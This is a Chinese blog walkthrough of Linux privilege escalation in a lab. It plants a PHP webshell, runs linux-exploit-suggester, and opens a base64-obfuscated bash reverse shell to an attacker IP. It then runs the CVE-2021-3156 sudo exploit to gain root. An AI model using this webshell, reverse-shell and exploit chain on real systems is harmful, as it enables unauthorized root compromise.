Linux提权脚本

admin 2023年1月8日22:55:05安全工具评论6 views554字阅读1分50秒阅读模式

前言

实际环境中会遇到过很多有shell但是权限不够的情况,那么对于我这种对内核提权的知识只存在脏牛提权的懒狗来说,最方便快捷的方式就是拿脚本来批量看当前版本的内核有哪些可以利用的脚本

正文

先搭建个环境

在php环境里写个一句话

Linux提权脚本

拿蚁剑连接

Linux提权脚本

虚拟终端运行,查看权限

Linux提权脚本

上传自动根据内核看提权的脚本

1github:https://github.com/mzet-/linux-exploit-suggester

通过一句话木马上传该.sh文件

Linux提权脚本

赋7权限,可执行

Linux提权脚本

操作完毕后,在蚁剑的虚拟终端中执行脚本

Linux提权脚本

Linux提权脚本

可以看到当前版本的内核有挺多可以利用的漏洞的,我这里挑一个CVE-2021-3156演示

使用命令反弹一个shell回来

1echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguNDAuMTI5LzQ0NDQgMD4mMQ== | base64,-d | bash,-i

Linux提权脚本

下载地址

1https://codeload.github.com/blasty/CVE-2021-3156/zip/main

下载完后,还是通过一句话木马上传上去

ubuntu系统一般都是自带python的,所以上传上去后,直接执行,可以看到已经root

Linux提权脚本


懒狗必备傻瓜式脚本

原文始发于微信公众号(E条咸鱼):Linux提权脚本

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月8日22:55:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Linux提权脚本 http://cn-sec.com/archives/1022569.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: